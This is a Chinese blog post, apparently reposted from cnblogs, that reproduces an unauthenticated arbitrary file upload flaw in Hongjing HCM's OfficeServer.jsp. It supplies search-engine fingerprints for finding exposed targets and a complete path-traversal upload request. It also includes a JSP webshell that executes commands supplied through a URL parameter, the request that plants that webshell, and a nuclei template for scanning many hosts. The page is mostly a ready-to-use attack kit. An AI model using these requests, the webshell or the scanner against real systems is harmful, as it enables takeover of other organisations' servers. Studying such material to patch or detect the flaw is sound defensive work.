宏景HCM 任意文件上传漏洞复现

时间：2023-09-15 09:34:17浏览次数：41

标签：宏景 image Content 2e 537.36 originalCreateDate 复现 HCM

漏洞概述

宏景HCM OfficeServer.jsp接口处存在任意文件上传漏洞，未经过身份认证的远程攻击者可利用此漏洞上传任意文件，最终可导致服务器失陷。

漏洞复现

鹰图指纹：app.name="宏景 HCM"
fofa语法：app="HJSOFT-HCM"
登录页面如下：

POC：

POST /w_selfservice/oauthservlet/%2e./.%2e/system/options/customreport/OfficeServer.jsp HTTP/1.1
Content-Type: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Length: 418

DBSTEP V3.0     351             0               666             DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
FILETYPE=Li5cMW5kZXguanNw
RECOR1DID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66

helloword

注：请求体中的FILETYPE字段是base64加密的上传文件名

尝试上传

验证

漏洞利用

编写一个带命令回显的jsp马子

<% if("123".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>

上传马子

POST /w_selfservice/oauthservlet/%2e./.%2e/system/options/customreport/OfficeServer.jsp HTTP/1.1
Content-Type: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Length: 418

DBSTEP V3.0     351             0               666             DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
FILETYPE=Li5cMW5kZXguanNw
RECOR1DID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
 
<% if("123".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>

nuclei批量yaml文件

id: hongjing_HCM_OfficeServer_upload
info:
  name: Template Name
  author: mhb17
  severity: critical
  description: description
  reference:
    - https://
  tags: tags
requests:
  - raw:
      - |-
        POST /w_selfservice/oauthservlet/%2e./.%2e/system/options/customreport/OfficeServer.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
        Content-Length: 429
        Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
        Connection: close
        Content-Type: 
        Accept-Encoding: gzip, deflate

        DBSTEP V3.0     351             0               666             DBSTEP=REJTVEVQ
        OPTION=U0FWRUZJTEU=
        currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
        FILETYPE=Li5cMW5kZXguanNw
        RECOR1DID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
        originalFileId=wV66
        originalCreateDate=wUghPB3szB3Xwg66
        FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
        needReadFile=yRWZdAS6
        originalCreateDate=wLSGP4oEzLKAz4=iz=66

        helloword
      - |+
        GET /1ndex.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

    req-condition: true
    matchers:
      - type: dsl
        condition: and
        dsl:
          - 'contains((body_2), "helloword") && status_code_2 == 200'

标签：宏景,image,Content,2e,537.36,originalCreateDate,复现,HCM
From： https://www.cnblogs.com/pursue-security/p/17704105.html

MFAN论文阅读笔记（待复现）
论文标题：MFAN:Multi-modalFeature-enhancedAttentionNetworksforRumorDetection论文作者：JiaqiZheng,XiZhang,SanchuanGuo,QuanWang,WenyuZang,YongdongZhang论文来源：IJCAI2022代码来源：Code介绍一系列基于深度神经网络融合文本和视觉特征以产生多模态后表......
【漏洞复现】致远OA前台任意用户密码重置漏洞
简介致远OA是一款协同管理平台，主要面向中大型、集团型企业和组织的协同管理软件产品。产品聚焦企业"智慧流程、业务定制、统一门户、移动办公、应用集成、数字决策"六大核心需求，同时具备智能化、平台化、移动化、定制化、数字化五大特性。漏洞描述致远官方发布了短信验证码绕过......
Django_debug page_XSS漏洞(CVE-2017-12794)漏洞复现
目录1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞分析3、漏洞验证说明内容漏洞编号CVE-2017-12794漏洞名称Django_debugpage_XSS漏洞漏洞评级影响范围1.11.5版本漏洞描述修复方案1.1、漏洞描述1.11.5版本，修复了......
永恒之蓝漏洞复现
MetasploitFramework（简称MSF）是一款强大的开源渗透测试工具，具有多种功能和用途。它的主要作用包括：渗透测试：MetasploitFramework允许安全专业人员模拟黑客攻击，以发现和利用系统和应用程序中的漏洞。这有助于组织识别并修复潜在的安全问题，提高系统的安全性。漏洞利用：Metasploit包......
googlectf2023 gradebook 复现（TOCTOU）
Gradebook结构根据函数sub_2247开头的部分可以推测出gradebook的结构0x4year0x8gradebookname(32bytes)0x28studentname(32bytes)0x48sizeofthisgradebook(uint)0x50firstgradestructureoffset0x58newgradestructureoffset每一条记录grade......
IDEFICS 简介: 最先进视觉语言模型的开源复现
引言CodeLlama是为代码类任务而生的一组最先进的、开放的Llama2模型，我们很高兴能将其集成入HuggingFace生态系统！CodeLlama使用与Llama2相同的社区许可证，且可商用。今天，我们很高兴能发布HuggingFace对CodeLlama的全面支持,包括:Hub上的模型支持，包括模型......
Nginx_(背锅)解析漏洞复现
目录Nginx解析漏洞复现1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞扫描3、漏洞验证1.5、深度利用GetShellNginx解析漏洞复现说明内容漏洞编号漏洞名称漏洞评级影响范围漏洞描述Nginx解析漏洞该解析漏洞是PHPCGI的......
【漏洞复现】DataEase数据可视化分析工具SQL注入-CVE-2023-40771
1、DataEase数据可视化分析工具简介DataEase是开源的数据可视化分析工具，帮助用户快速分析数据并洞察业务趋势，从而实现业务的改进与优化。DataEase支持丰富的数据源连接，能够通过拖拉拽方式快速制作图表，并可以方便与他人分享。前端：Vue.js、Element图库：ApacheECharts、AntV后......
Metinfo6.0.0任意文件读取漏洞复现
1.1、漏洞描述漏洞名称：MetInfo任意文件读取漏洞简介：MetInfo是一套使用PHP和MySQL开发的内容管理系统，其中的/app/system/include/module/old_thumb.class.php文件存在任意文件读取漏洞，攻击者可利用该漏洞读取网站的敏感文件。下载地址：历史版本安装文件下载Ver_6.0.01.2、漏洞......
Metinfo5.0.4-任意文件包含漏洞复现
目录文件包含漏洞描述：漏洞等级影响版本漏洞利用蚁剑连接图片马读取敏感目录读取php源码登录管理员界面http://127.0.0.1/MetInfo5.0.4/admin/上传一句话木马,或者图片马制作图片木马copy1.jpg/b+1.php/a2.jpg文件包含首页漏洞描述：MetInfo是一个专业的企业级CMS建......

宏景HCM 任意文件上传漏洞复现

漏洞概述

漏洞复现

漏洞利用

nuclei批量yaml文件

相关文章

赞助商

阅读排行